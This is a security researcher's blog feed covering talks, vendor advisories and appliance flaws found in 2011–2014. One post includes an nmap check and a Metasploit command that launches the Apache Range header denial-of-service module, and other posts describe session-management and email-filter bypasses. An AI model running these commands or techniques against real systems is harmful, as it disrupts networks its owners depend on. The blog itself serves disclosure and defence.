tag:blogger.com,1999:blog-64287405490410975002024-03-18T14:37:50.572+00:00insidetrust.com<p align="right">IT Security, Penetration testing, and Exploit-development</p>Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.comBlogger93125tag:blogger.com,1999:blog-6428740549041097500.post-78104768905912305752014-05-31T07:11:00.001+01:002014-05-31T07:11:31.746+01:00Speaking at BlackHat US 2014I found out this week that my talk on enumerating and bypassing email and web filtering solutions has been accepted for BlackHat US 2014<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQkmytlmDHisfMytfIsutukU4an8xfXIkrttPukCwuAfTp8l-xbjvK7Rj_qN6_qzQ_QKa7Qtca1ngJSMOcjZWhJiAr2N6UEAKdpqwUffJhOXbQR90o5GnEq2PqOGUzechaJL5QxRMg3D4/s1600/blackhat.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQkmytlmDHisfMytfIsutukU4an8xfXIkrttPukCwuAfTp8l-xbjvK7Rj_qN6_qzQ_QKa7Qtca1ngJSMOcjZWhJiAr2N6UEAKdpqwUffJhOXbQR90o5GnEq2PqOGUzechaJL5QxRMg3D4/s1600/blackhat.JPG" height="146" width="320" /></a></div>
<br />
Here is a synopsis of my talk, should be fun<br />
<a href="https://www.blackhat.com/us-14/briefings.html#Williams">https://www.blackhat.com/us-14/briefings.html#Williams</a><br />
<br />
<br />
<br />Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com29tag:blogger.com,1999:blog-6428740549041097500.post-50903010469828603722014-03-25T13:24:00.000+00:002014-03-26T07:29:43.342+00:00Hacking Email Filtering Appliances and Solutions - talks and toolsI recently presented at Hackcon in Oslo Norway, and at IT-Defense in Cologne, Germany; on the subject of "Hacking Email Filtering Appliances and Solutions"<br />
<br />
I briefly talked about some of the vulnerabilities I have previously found in Security Appliances, but talked in much more detail about recent research I have been developing for automated enumeration of email filtering services, products and policies (offensively, from the outside).<br />
<br />
Specifically, I talked about the enumeration techniques, and how this information could be used by malicious hackers to improve the efficiency of attacks against organizations. This type of automated reconnaissance can be combined with Phishing attacks and to quickly find and exploit vulnerable systems and users.<br />
<br />
Feedback from both these talks has been very good, and I am planning to release tools, and a white paper over the coming months.<br />
<div>
<br /></div>
I have been developing MailFEET, an enumeration tool with defense in mind, to enable organizations to identify weakness in their email filtering solutions. I have tested this tool with hundreds of domains, to find some of the most common policy bypasses, and we have used these techniques with several of our customers recently to help them identify and close such loopholes.<br />
<br />
In terms of the loopholes, well, there are a lot, and I will probably talk about that more in a future post, but for a brief three bullet-point summary:<br />
<br />
<ul>
<li>Most email filtering solutions do not block embedded executable code or scripts in office documents.</li>
<li>Almost all companies tested had no filtering for common encrypted attachments (password protected office documents or zip files for example).</li>
<li>A small but significant percentage of organizations had direct bypasses in their email filtering (i.e. in around 5% - 10 % of cases, it was possible to directly deliver to relays or mail-servers behind the filtering solution, by enumerating the relevant IPs from SMTP header information).</li>
</ul>
<br />
Tools I am currently working on include:<br />
<br />
<b>MailFEET</b> - Mail Filter External Enumeration Tool - For finding vulnerable email filtering products, and flaws or bypasses in email filtering policy (written in Python and SQLite) - This just needs tidying up a bit before release.<br />
<br />
<b>DAPHT</b> - Document and Archive Payload Hiding Tool - For automatically embedding test payloads in a variety of formats, to hide them from most email and web filtering solutions (written in C#).<br />
<br />
<b>WebFEET</b> - Web Filter External Enumeration Tool - For finding vulnerable web filtering products, and flaws or bypasses in web filtering policy (early days of a work in progress - probably will be mainly JavaScript, PHP and SQLite)<br />
<br />
<br />
<br />Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com88tag:blogger.com,1999:blog-6428740549041097500.post-39225177458517409482013-06-07T22:40:00.002+01:002013-06-09T21:49:34.291+01:00Athcon 2013I am just on my way back from presenting at Athcon 2013 – the premier IT Security conference in Greece.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRLZ3WAhyphenhyphenkzhZHcPiIuEiLJLRuhNJIFwCQeUByrqMzB8ncK4roY-MS1LkUNQ8WcvU_TrJJg_uKzBCGGwwB9S06F3gYD3t1WwGfQMgaPhmd6izgoiBPFkQaz7VCU-ManRCBKUAQcJfHbvU/s1600/BME1F77CIAIL1r3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="475" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRLZ3WAhyphenhyphenkzhZHcPiIuEiLJLRuhNJIFwCQeUByrqMzB8ncK4roY-MS1LkUNQ8WcvU_TrJJg_uKzBCGGwwB9S06F3gYD3t1WwGfQMgaPhmd6izgoiBPFkQaz7VCU-ManRCBKUAQcJfHbvU/s640/BME1F77CIAIL1r3.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<a href="http://www.athcon.org/">http://www.athcon.org/</a></div>
<br />
It was my first time at Athcon, but I have to say that I was impressed. The organisers did a great job with the venue and facilities, and choosing speakers which had a great mix of content and technical depth.<br />
<br />
I presented my research on “Hacking Security Appliances” (which I have previously presented at BlackHat Europe, and Dublin Source earlier this year). That’s probably my last time presenting that particular material, as I want to keep things fresh and I'm currently working on various ideas I have for interesting new research.<br />
<br />
For reference my base slides and white-paper for the material are here:<br />
<a href="https://media.blackhat.com/eu-13/briefings/B_Williams/bh-eu-13-hacking-appliances-bwilliams-wp.pdf">https://media.blackhat.com/eu-13/briefings/B_Williams/bh-eu-13-hacking-appliances-bwilliams-wp.pdf</a><br />
<a href="https://media.blackhat.com/eu-13/briefings/B_Williams/bh-eu-13-hacking-appliances-bwilliams-slides.pdf">https://media.blackhat.com/eu-13/briefings/B_Williams/bh-eu-13-hacking-appliances-bwilliams-slides.pdf</a><br />
<br />
I saw good solid presentations from other speakers including the following:<br />
<br />
Max Sobell - Security of NFC wallets<br />
Michele Orru - Using BeEf for custom shellcode and inter-protocol attacks<br />
Jurriaan Bremer - Automated de-obfuscation of android apps and malware<br />
Kostas Papapanagiotou - History of OWASP Top 10<br />
<div>
<br /></div>
(and also had a good meal out in Athens last night, with some of the other speakers, which was great fun)<br />
<br />
Athcon also had a “capture the flag” (CTF) competition hosted by Symantec (unfortunately I didn't get time to take part, but is seemed to be very popular).<br />
<br />
All in all a great conference that I would like to attend (and speak there) again.<br />
<div>
<br /></div>
Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com19tag:blogger.com,1999:blog-6428740549041097500.post-50867400363211359322013-03-12T09:46:00.000+00:002013-03-12T10:09:42.121+00:00BlackHat EU this weekI am looking forward to speaking at BlackHat EU again on Thursday of this week as I will be talking on the subject of "Hacking Appliances: Ironic exploits in security products" which is an area of research I have particularly enjoyed.<br />
<br />
<a href="http://www.blackhat.com/eu-13/schedule/briefings-14.html">http://www.blackhat.com/eu-13/schedule/briefings-14.html</a><br />
<br />
In short, I will be discussing some of the vulnerabilities I have escalated to various vendors of popular Security Appliances during 2012, and demonstrating how these vulnerabilities could be exploited in realistic scenarios.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTMPfrvYUsObvG1g6o1T0J5SR-3dcn-iDps9kLja9Nsgd3ibu07Lbf0IQVq4Dic6WWTjWv_YRde6n9YsAnBroapsvUkahYTYC-ExwwC93P7GezP279tAnjR-c6JtuPNf0uNzj0u_RnV_s/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTMPfrvYUsObvG1g6o1T0J5SR-3dcn-iDps9kLja9Nsgd3ibu07Lbf0IQVq4Dic6WWTjWv_YRde6n9YsAnBroapsvUkahYTYC-ExwwC93P7GezP279tAnjR-c6JtuPNf0uNzj0u_RnV_s/s320/Capture.JPG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
There will be some root shell, for those of us who like that sort of thing, but I think the most interesting aspect is that most of the vulnerabilities were typical <a href="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project">OWASP Top 10</a> type issues, or other fairly basic misconfigurations, which could be found and exploited in a few days using typical attack techniques.<br />
<br />
People outside the Pentesting community find it surprising when I tell them that most popular Security Appliances I have looked at had fairly basic and rather easy to find vulnerabilities. Most of the products I looked at were popular and widely deployed, so the concerning thing is that companies using these products (and the vendors who produce them) were unaware that these products suffered from such issues.<br />
<br />
In regard to the irony; I have certainly seen some ironic issues over the past 18 months, for example issues like:<br />
• A URL filter which could be fully compromised with a malicious URL<br />
• Email filtering products which could be fully compromised with malicious emails<br />
• A single-sign-on system where all the credentials could be extracted in an unauthenticated way<br />
• A firewall that could be fully compromised from the outside due to authentication-bypass<br />
• A secure remote access gateway which could give unauthenticated external attackers free and easy access to the internal network<br />
<br />
I showed some of these issues last year, I will be showing a few more during my talk on Thursday.<br />
(by "fully compromised" I generally mean a root shell on the underlying operating system)<br />
<br />
<br />Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com27tag:blogger.com,1999:blog-6428740549041097500.post-60234839611991934292012-06-27T18:54:00.003+01:002012-06-27T21:50:55.551+01:00Symantec have fixed some exploits in Symantec Message FilterLooks like Symantec have finally fixed some security issues I raised with them back in January 2012 for Symantec Message Filter 6.3.<br />
<br />
It took them 6-months - so I am not impressed with their patching-cycle, or their focus on IT Security generally (this is supposed to be a security product after all).<br />
<br />
Basically, as I described at BlackHat EU back in May 2012, this product-installer had versions of Tomcat and MySQL which were 7 years old, with default content and no patches (so the product had well-known third-party exploits right out of the box).<br />
<br />
Additionally (which I felt I couldn't describe at the time, because it was 0-day) there were session-management and information-disclosure issues in the administrative UI, plus Cross Site Request Forgery (CSRF) of administrative-functions and XSS.<br />
<br />
More detail is here:<br />
<a href="http://www.symantec.com/security_response/securityupdates/detail.jsp?suid=20120626_00&fid=security_advisory&pvid=security_advisory&year=2012">http://www.symantec.com/security_response/securityupdates/detail.jsp?suid=20120626_00&fid=security_advisory&pvid=security_advisory&year=2012</a><br />
<br />
The CVEs are:<br />
<br />
CVE-2012-0300<br />
CVE-2012-0301<br />
CVE-2012-0302<br />
CVE-2012-0303Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com7tag:blogger.com,1999:blog-6428740549041097500.post-63150810864013995342012-06-21T14:22:00.004+01:002012-06-24T20:03:11.002+01:00More on Exploiting Security GatewaysHere is a quick update on some of my exploit-development research into finding exploits in Security Gateways.<br />
<br />
This is the video from my presentation at BlackHatEU 2012 back in May, which shows some typical examples of exploits I had found in the period from October 2011 to March 2012 (all of the issues in the demo videos have now been addressed).<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/XfZS1iZ2PpY" width="420"></iframe>
</div>
<div style="text-align: center;">
<span style="font-size: xx-small;">(this video is around 40 minutes, and may take a minute or so to start depending on your connection)</span></div>
<br />
If you are interested in the technical side, the white-paper that went with this presentation can be found here:<br />
<a href="http://www.nccgroup.com/en/learning-research-centre/security-testing-audit-compliance-resources/white-papers/">http://www.nccgroup.com/en/learning-research-centre/security-testing-audit-compliance-resources/white-papers/</a><br />
<br />
Since then I have continued my research project, and to-date have found around 80 exploits (most of which are in Security Gateways, though I have also started to look at some other types of appliances as well). Fixes and updates have been released for at least 25 of these exploits so far, though the majority are still in the respective vendor's patch-cycle (this means that these products are improving, which is a positive outcome).<br />
<br />
Some vendors are very reactive, a few vendors (especially Symantec and Barracuda) don't seem to be able to turn around fixes within a reasonable timeframe (Symantec still have not addressed serious issues I raised with them back in January 2012 - despite me chasing them). The good news is that many vendors address issues within a couple of months or so, and some within a few days - which is excellent!<br />
<br />
As for a briefest of summaries; this research is continuing to uncover more and more similar issues, showing alarming trends in the insecurities of security-product Web UIs. For example:<br />
<br />
<div>
Almost all Security Gateway products had</div>
<ul>
<li>Unauthenticated information disclosure</li>
<li>XSS with session-hijacking</li>
</ul>
The majority had<br />
<ul>
<li>CSRF of admin functions</li>
<li>Command-injection</li>
<li>Privilege escalation</li>
</ul>
<div>
Several had</div>
<ul>
<li>Direct authentication-bypass</li>
<li>Stored out-of-band XSS and OSRF</li>
</ul>
<div>
A few had</div>
<ul>
<li>Gateway Denial-of-Service</li>
<li>There were a wide variety of more obscure issues</li>
</ul>
Also, the majority had bruteforce password guessing issues (and though I considered this too basic for my research, this is also a big failure on the part of these software vendors)<br />
<br />
Basically speaking, almost all of the Security Gateways I looked at could be compromised by an attacker, and used as an entry point to break into corporated networks.<br />
<br />
More recently, and of particular interest I have been looking at ways of exploiting these systems via insecure backup/restore functions, using request forgery to perform arbitrary file-upload. I feel this is an interesting attack-vector because it usually results in a "root shell" - maybe I will do a post on that at some point to explain how the attack works.<br />
<br />
Anyway, there are plenty more similar products out there, so I will continue looking. If you have any suggestions of products you think I should look at (especially security appliances) let me know.Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com6tag:blogger.com,1999:blog-6428740549041097500.post-33717238142852583682012-03-16T14:59:00.016+00:002012-03-19T14:09:31.370+00:00BlackHat EU 2012 - Day two and three summaries<div>I have been enjoying myself at BlackHat Europe 2012, soaking up some of the leetness, absorbing some of the technologies I am less familiar with, meeting great people, and talking with them about things which really interest me - which is all good.<br />
<br />
<br />
<strong>BlackHat EU 2012 - Day two</strong></div><br />
My Presentation seemed to go well, with several interested people coming up to ask various questions afterwards, maybe due to the fact that I described and showed around 10 exploits I recently discovered in common security products (all patched now BTW - but some very interesting, some creative, and several rather ironic - for example: "a spam the reconfigures the spam-filter", "a URL that owns the URL-filter").<br />
<br />
<br />
My favourite presentation of Day two was "Data mining a mountain of Vulnerabilities" with Chris Wysopal.<br />
<br />
This was quite a dry subject, but very well presented. Lots of data on vulnerabilities, with statistics on vulnerabilites sorted by application language, platform, horizontal and vertical markets, (among many other things)<br />
<br />
Really interesting data, and something I feel that I might consult when doing application testing.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX3A8GFHdODEgEdNLOmRSTwB3_oM9XGjYEY0_hgNJZid6hEremyvuSK_-48AK3CTmFkNzLWFza-XC29xxOVXIUnAYkfRfpzdXfITX48qmco9KdLdMcKE5dFQ3pV0AVd5L4yrC2Rmst-1w/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX3A8GFHdODEgEdNLOmRSTwB3_oM9XGjYEY0_hgNJZid6hEremyvuSK_-48AK3CTmFkNzLWFza-XC29xxOVXIUnAYkfRfpzdXfITX48qmco9KdLdMcKE5dFQ3pV0AVd5L4yrC2Rmst-1w/s640/Capture.PNG" width="640" /></a></div><br />
Chris had some really interesting graphs, the one above showing clearly that most web-apps contain at least one of the most serious flaws.<br />
<br />
<strong>Day three</strong><br />
<br />
Some really interesting presentations today on mobile/smartphone security. It's hard to choose the best one really, as the following three were very good, and looked like the conclusions were based on very solid research (and many hours of work).<br />
<br />
<ul><li>"Secure Password Managers" and "Military-Grade Encryption" on Smartphones: Oh Really? by Andrey Belenko + Dmitry Sklyarov</li>
<ul><li>Hmm... so password managers on smartphones are not very well coded - not a surprise really but, a lot of work has been done by these guys to review some of the most popular ones and find some bugs</li>
</ul><li>Apple vs. Google Client Platforms by Felix 'FX' Lindner</li>
<ul><li>A great talk this, delivered in FX's highly amusing style</li>
</ul><li>The Mobile Exploit Intelligence Project by Dan Guido + Mike Arpaia</li>
<ul><li>Interesting perspective from acedemia on the stats behind mobile exploits, it seems that the hype might be just hype (at least on the iOS platform, more potential on Android though, but still, not a great deal of real platform-pwnage happening)</li>
</ul></ul><br />
Anyway, I am in the airport on the way home, and it has been a very good week...<br />
<div></div>Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com5tag:blogger.com,1999:blog-6428740549041097500.post-34693858140381157872012-03-15T21:56:00.007+00:002012-03-15T23:01:40.389+00:00McAfee Security Gateway patched this week for the issues I reportedFair play to McAfee for fixing these issues, giving an accurate description of the issues and crediting me with the discovery. This is probably one of the best customer notifications I have seen from the vendors I have dealt with during my research project.<br />
<br />
<a href="https://kc.mcafee.com/corporate/index?page=content&id=SB10020">https://kc.mcafee.com/corporate/index?page=content&id=SB10020</a><br />
<br />
<br />
<strong>Affected Software:</strong> McAfee Email and Web Security 5.x, McAfee Email Gateway 7.0<br />
<br />
<br />
<strong>NGS00153 – Reflected XSS</strong><br />
McAfee Email and Web Security Appliance Software 5.x/ McAfee Email Gateway 7.0 is prone to reflective XSS allowing an attacker to gain session tokens and run arbitrary Javascript in the context of the administrators browser and the McAfee Security Appliance Management Console/Dashboard.<br />
<br />
<strong>NGS00154 – Logout Failure <span style="color: #cc0000; font-size: x-small;">(I would have called this session-management issues, but whatever)</span></strong><br />
When an administrator closes the Management console/Dashboard without clicking logout and returns to the Dashboard later, they appear to be logged out, however, this is simply the state of the Javascript in his browser, and the session-token is still be active on the server-side. If an attacker gains a session-cookie (perhaps using XSS, or by some other means), they can make a dummy login attempt (with a dummy password) and simply edit the (failure) response. They will then be logged-in, and can use the Dashboard as if he had logged-in as the administrator.<br />
<br />
<strong>NGS00155 – Password Reset issue</strong> <br />
Any logged-in user can bypass controls to reset passwords of other administrators.<br />
<br />
<strong>NGS00156 – Session Disclosure</strong><br />
Active session tokens of other users are disclosed within the Dashboard.<br />
<br />
<strong>NGS00157 – Weak Encryption of Backups</strong><br />
Password hashes can be recovered from a system backup and easily cracked.<br />
<br />
<strong>NGS00158 – File Download Issue</strong><br />
Arbitrary file download is possible with a crafted URL, when logged in as any user.<br />
<br />
<strong>NGS00159 – File Content Leakage</strong><br />
File contents disclosure as if root user, when logged in as any user.Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com7tag:blogger.com,1999:blog-6428740549041097500.post-27553795077362853672012-03-15T13:09:00.004+00:002012-03-15T13:14:43.515+00:00BlackHat EU 2012 - Day one summaryI am currently enjoying BlackHat Europe 2012<br />
<br />
My favourite presentation for Day 1 was:<br />
<br />
<strong>Jeff Jarmoc - SSL/TLS interception proxies (and transitive trust)</strong><br />
Really interesting research (to me) as it was kind of adjacent to some of the research I have been doing, and Jeff has looked at some very similar products that I have, but from a different perspective.<br />
<br />
Jeff described his research into an issue that I have felt could be a problem (but that I hadn’t investigated, and he has done a great job with his investigation, so this answers some of the questions I had in the back of my mind ;o).<br />
<br />
Put simply; When companies implement content-security for encrypted web-traffic (anti-virus, exe-blocking and content analysis for HTTPS traffic) the way to do this is usually to get all the clients within the environment to trust the proxy’s CA cert. Then, traffic is decrypted on the proxy and scanned (the proxy handles the external encryption to the target site) and the traffic is then re-encrypted internally to the client (using the proxy’s trusted cert).<br />
<br />
The issue is; “What happens when there is a problem with the cert of the original target site?” and the answer is - “These issues are largely ignored, and the information is dropped, so that everything looks fine on the client-side”.<br />
<br />
To paraphrase the reason for this is dropping the baby is that; “SSL was not designed to do this, and this solution is hard enough to implement as it is, so vendors of these products try to make the product set-up and management as easy as possible, and iron-out any of these minor ‘issues’ by ignoring them”.<br />
<br />
However, this causes a big security hole because certificates that are spoofed, expired or revoked are often made to look like they are “fine and dandy” to the client – which from a security-perspective, in short, is crap.<br />
<br />
Great presentation Jeff!<br />
<br />
<br />
Quote of the day: “Humanity needs crime, otherwise we would have stomped it out by now.. and the internet needs crime too..”<br />
(Whitfield Diffie, philosophising about “life, the internet and everything”)Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com2tag:blogger.com,1999:blog-6428740549041097500.post-1203772832749325262012-02-11T20:57:00.010+00:002012-03-15T22:59:50.064+00:00Apache Range header DoS vulnerability can be a Security Gateway killerLinux-based appliance UIs can be vulnerable to a serious Denial of Service vulnerability. I am talking here about the Apache Range header DoS vulnerability from August 2011.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfwfgatwn4GbD2mguAZudLDgwYFqt2_M1hZR1LeUXPDZemcaz83EA1rPe8I8_UQApW5_eddoI0LObwjDWmlmOBLAmA4FlWWyNueZvdcO9WeETVVgoSMYb3NOgkHIxFnfgveQV1H9sdY6c/s1600/feather-small.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfwfgatwn4GbD2mguAZudLDgwYFqt2_M1hZR1LeUXPDZemcaz83EA1rPe8I8_UQApW5_eddoI0LObwjDWmlmOBLAmA4FlWWyNueZvdcO9WeETVVgoSMYb3NOgkHIxFnfgveQV1H9sdY6c/s1600/feather-small.gif" /></a></div><br />
This exploit works by making a series of HTTP requests with overlapping ranges in the "Range" or "Request-Range" request headers and results in memory and CPU exhaustion.<br />
<br />
For an unpatched Apache server, in many cases a remote unauthenticated attacker could exploit this issue to make the system unresponsive - with only a few packets.<br />
<br />
Now, usually this exploit relates to a webserver hosting a website (or multiple websites) so has a limited scope.<br />
<br />
However, in the case where the target is the product UI of a Security Gateway, this can mean that the Gateway becomes unresponsive, and if this is a multi-protocol Gateway or Firewall UI - the attacker could potentially disrupt network connectivity (affecting a whole network, rather than a single system).<br />
<br />
I have seen several instances recently where a Security Gateway completely freezes up after a few dozen malicious packets, and the system requires a hard-reset (power-cycle) to recover. All network traffic stopped, and the Web UI and even the console were completely unresponsive.<br />
<br />
In each of these cases, the Web UIs were often left exposed to the internet (a simple "Google Dork" found dozens of the affected product UIs exposed to the internet).<br />
<br />
The solution to this problem is simple, these products need to be patched, but it seems that various vendors of Security Gateways (and other appliances) are not keeping up with their patch-managment, or are unaware of the problem.<br />
<br />
This is an example of how to test for this issue (here using Nmap):<br />
<br />
(You need the nmap *.nse script from here if you want to test this <a href="http://nmap.org/nsedoc/scripts/http-vuln-cve2011-3192.html">http://nmap.org/nsedoc/scripts/http-vuln-cve2011-3192.html</a> )<br />
<br />
<span style="font-family: "Courier New", Courier, monospace; font-size: x-small;">nmap -Pn -sS --script http-vuln-cve2011-3192 -p T:(port here) (ip address here) <port><ip address="">--script-args http-vuln-cve2011-3192.path=(vulnerable resource here)<url a="" resource="" to="" vulnerable=""></url></ip></port></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace; font-size: x-small;">Starting Nmap 5.61TEST4 ( </span><a href="http://nmap.org/"><span style="font-family: "Courier New", Courier, monospace; font-size: x-small;">http://nmap.org</span></a><span style="font-family: "Courier New", Courier, monospace; font-size: x-small;"> ) at 2012-02-11 20:12 GMT<br />
Nmap scan report for <ip address=""><br />
Host is up (0.22s latency).<br />
PORT STATE SERVICE<br />
(port)<port>/tcp open https<br />
<span style="color: #cc0000;">| http-vuln-cve2011-3192: <br />
| VULNERABLE:<br />
| Apache byterange filter DoS<br />
| State: VULNERABLE<br />
| IDs: CVE:CVE-2011-3192 OSVDB:74721</span></port></ip></span><br />
<span style="font-family: "Courier New", Courier, monospace; font-size: x-small;"><ip address=""><port>| Description:<br />
| The Apache web server is vulnerable to a denial of service attack when numerous<br />
| overlapping byte ranges are requested.<br />
| Disclosure date: 2011-08-19<br />
| References:<br />
| <a href="http://seclists.org/fulldisclosure/2011/Aug/175">http://seclists.org/fulldisclosure/2011/Aug/175</a><br />
| <a href="http://nessus.org/plugins/index.php?view=single&id=55976">http://nessus.org/plugins/index.php?view=single&id=55976</a><br />
| <a href="http://osvdb.org/74721">http://osvdb.org/74721</a><br />
|_ <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192</a></port></ip></span><br />
<span style="font-family: "Courier New", Courier, monospace; font-size: x-small;">Nmap done: 1 IP address (1 host up) scanned in 3.32 seconds</span><br />
<br />
(It is very important to get the URL to a vulnerable resource correct, otherwise you may miss the issue, GIFs work quite well, but try a few resources)<br />
<br />
To be absolutely sure that the vulnerability is exploitable, it can be exploited with Metasploit (<span style="color: #cc0000;">make sure you do this in legal and test conditions, such as in a test lab or on a VM you own</span>).<br />
<br />
<span style="font-family: "Courier New", Courier, monospace; font-size: x-small;">/pentest/exploits/framework/msfcli auxiliary/dos/http/apache_range_dos RLIMIT=50 RHOST=(ip address here)<ip address=""> RPORT=(port here) <port>URI=(vulnerable resource here)<url a="" resource="" to="" vulnerable=""> E</url></port></ip></span><br />
<br />
Here is some detail from Apache on how to address the problem:<br />
<a href="http://httpd.apache.org/security/CVE-2011-3192.txt">http://httpd.apache.org/security/CVE-2011-3192.txt</a><br />
<br />
...but if you are a customer using one of the affected appliances, you won't be able to fix this yourself, you will need to get in contact with your respective vendor, and get them to "pull their finger out" with their patch-management - and then maybe wait a month or so before they fix it.Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com4tag:blogger.com,1999:blog-6428740549041097500.post-2867484220832631222012-01-20T22:51:00.007+00:002012-02-26T15:35:40.905+00:00An update on my research into attacking Security Gateways via the Web UI – and Blackhat EuropeI haven't written much on my blog for the past few months. This is because I have been very busy with my exploit-development research.<br />
<br />
A while back I had the idea to combine web-attacks with Security Gateways, mix things up, and see what happens. This has been very productive, and a lot of fun.<br />
<br />
In short, over the past 4 months, I have raised 30+ PoC exploits with vendors of Security Gateways. I have looked at quite a few Gateway products, and discovered serious vulnerabilities in almost all of the ones I have investigated.<br />
<br />
Whilst Security Gateway products provide good security features for the protocols and services they protect, if a gateway product is not secure in itself, it can be attacked directly and compromised.<br />
<br />
If an attacker can gain control of the gateway of an organization, this is a very powerful position for further attacks; such as traffic-sniffing and powerful man-in-the-middle attacks, disabling network protections, and pivoting the attack to target other systems and users on the internal network.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT2BO2amIXd02-UU-HSuljW6NS2SUAOBZZy5lC4101dqyFMu1qUsTx-p1yUMF1M8CJ4sQSrjqOaNAs81bsK0OOMCFcKfvLKF3tbIHdvolYWOL7xHuVd63O8xYIYO7XVasfkDUrRwXvwdQ/s1600/Picture1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT2BO2amIXd02-UU-HSuljW6NS2SUAOBZZy5lC4101dqyFMu1qUsTx-p1yUMF1M8CJ4sQSrjqOaNAs81bsK0OOMCFcKfvLKF3tbIHdvolYWOL7xHuVd63O8xYIYO7XVasfkDUrRwXvwdQ/s400/Picture1.png" width="400" /></a></div><br />
<br />
<br />
We often take the security of security-software for granted, assuming that – because the software has come from a company that understands security, then the product is very likely to be secure.<br />
<br />
This is frequently an incorrect assumption in regard to Security Gateway UIs, as usually the developers that design, code and test the UI are not “security” people, and are more focused on UI design, functionality, usability, supportability and branding, than on security.<br />
<br />
There are a huge variety of web application attacks that have been historically used against public-facing websites and their users. Many of these attacks are transferable to web-based product UIs, and this can have a very interesting impact when applied to Security Gateway UIs.<br />
<br />
Most of the serious issues I have found in Security Gateway products have been caused by one or more of the following:<br />
<ul><li>Lack of input-validation (leading to attacks such as XSS and Command-injection)</li>
<li>Predictable URLs and parameters (and therefore CSRF)</li>
<li>Excessive privileges of running services</li>
<li>Direct file browsing</li>
<li>Session-management issues</li>
<li>Weak session-tokens</li>
<li>Password Guessing</li>
<li>Authentication bypass</li>
<li>Verbose information disclosure</li>
<li>Out-of-date 3rd party software</li>
<li>Arbitrary file upload</li>
<li>Standard installs with poor configurations</li>
<li>Trivial Denial of Service vulnerabilities</li>
</ul><br />
I am currently working to complete a white-paper detailing some of the common findings, and I have recently been informed that I have been accepted to speak at Blackhat Europe on this subject. I will release the white-paper at Blackhat, so more information to come...<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2kLz1EcdwaJAcKH3N_TaXOpfDSbd-pV8V9jCc4ADCSpEf_6rc713_ahGcc8Ppy323SUsfPjoo2yifnXtVYS0YWXzyq3W22DWKVUM_RYejxkX1JMSOI5bDgCU_UQA2AKrvST5ACu7ce9c/s400/bh12eu_336x280.png" width="400" /></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="http://www.blackhat.com/html/bh-eu-12/bh-eu-12-briefings.html#williams">http://www.blackhat.com/html/bh-eu-12/bh-eu-12-briefings.html#williams</a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div>... and if you are going to Blackhat Europe, I might see you there!Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com2tag:blogger.com,1999:blog-6428740549041097500.post-89442844078227502512011-09-03T06:53:00.001+01:002011-09-03T07:01:36.179+01:00Practicing scanning and basic enumeration skills with a Solaris VMI'm pretty comfortable hacking-around with Linux, Windows and Macs, but one of the platforms I have not used much (so far) is Solaris.<br />
<br />
I love learning new things, so this seemed like a gap worth filling, especially as I am looking to take the Check CRT certification (in which Solaris/Oracle are a small part of the syllabus).<br />
<br />
I had a bit of a play with <a href="http://hub.opensolaris.org/bin/view/Main/downloads">OpenSolaris</a> a while back, which gave me a flavor of some of the differences between Linux an Solaris (incidentally the OpenSolaris project seems to be stalled/ending?).<br />
<br />
Anyway, I thought I would download the Solaris/Oracle VMs from from the following location and have a play (starting with some basic scanning):<br />
<br />
<a href="http://www.oracle.com/technetwork/server-storage/solaris/solaris-vm-405695.html">http://www.oracle.com/technetwork/server-storage/solaris/solaris-vm-405695.html</a><br />
<br />
